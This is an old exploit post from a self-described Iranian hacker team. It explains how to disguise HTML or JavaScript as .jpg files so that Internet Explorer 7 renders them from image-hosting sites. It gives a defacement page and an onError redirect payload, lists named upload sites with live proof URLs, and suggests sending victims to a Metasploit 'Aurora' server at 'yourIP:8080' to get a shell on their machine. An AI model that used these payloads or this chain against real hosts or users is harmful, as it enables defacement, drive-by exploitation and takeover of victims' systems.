############################################# # # # [+] IE 7 Java & Html Codes INJECTION # [+] Discovered By 7H3 BoSs # # ############################################# # # # # [] Founder : [ 7H3 BoSs ] # [] Members : [ ReZa , sub.z3l2o , Wishe ] # [] Team : [ KatRina iRanian Security Team ] # [] Greetz : [ ReZa , sub.z3l2o , Wishe , NEO ] # # # ############################################################################################################### # # # [+] html Exploit Example : # # Open A text document and insert a html code in that like this : # # <html> # <head> # <title>Hacked By KatRina Iranian Hackers</title> # </head> # <body bgcolor=black text=White> # <center><h2>Hacked By KatRina Iranian Hackers</h2> # <img src='http://www.gciran.com/services/graphic/star.jpg'> # <br> # <h2>We Are : </h2> # <bR> # <h2>ReZa , SuB zErO , Wishe , 7H3 BoSs</h2> # </center></body> # </html> # # then save it as jpg format # ############################################################################################################### # # [+] java Script Exploit Example : # # Open A text document and insert a java script code in that like this : # # # <img src="" onError="document.location='http://google.com'"> # # then save it as jpg format # ################################################# # # [+] Introduction : # # then save html code as jpg like KatRina.jpg # or insert java script codes and save it again as jpg file # then upload image in vulnerable images upload centers # remeber 30% of upload centers are vulnerable but not all # # ################################################## # # # [+] Html INJECTION : # # I create a text document and inserted html code in that then save it as jpg # My file name is Katrina.jpg thus i uploaded it in a vulnerable upload centers # # in this image upload center : http://datairan.gigfa.com/index.php # Uploaded file : http://datairan.gigfa.com/files/axc0goer2hor9499need.jpg # note : open in IE7 and you can see html code injected # # another upload center : http://upload.mamazy.net # bypassed : http://upload.mamazy.net/images/oncljs8ef6qng40kily.jpg # # another upload center : http://up.iranblog.com/ # bypassed : http://up.iranblog.com/37261/1267616595.jpg # # ################################################# # # [+] Java Script INJECTION : # # # i Create a text document then inserted Java Script Code in that and save it as jpg # my file name is KatRina.jpg and i inserted : # # <img src="" onError="document.location='http://google.com'"> # # and save it as jpg and upload it in a vulnerable upload centers and victim with IE7 # will redirect to google.com !!! # Example : http://up.iranblog.com/37261/1267642065.jpg # open with IE7 and you will be redirect to http://google.com # note this is example and you can do many things with this # for instant you can use "Aurora" IE Exploit in metasploit and exploit it as http://yourIP:8080/ # and do it like this : # # open a text document and insert : # # <img src="" onError="document.location='http://yourIP:8080'"> # # then save as jpg and upload it in a vulnerable image hosting and give uploaded url to victim # and he or his will redirect to your exploit url and you can gain shell of victim system !!! # ############################################################################################################### # # # [+] some vulnerable upload center : http://up.iranblog.com/ # http://datairan.gigfa.com/index.php # http://fuc.ir/ # http://upload.mamazy.net # # ################################################# # # # [+] Note : # # you can do many things with this method and use many html or java scripts codes or both ! # # # ENJOY ! # ################################################## # # # # [+] Contact : # i.The.l3oSs.i@Gmail.Com # # # ###################################################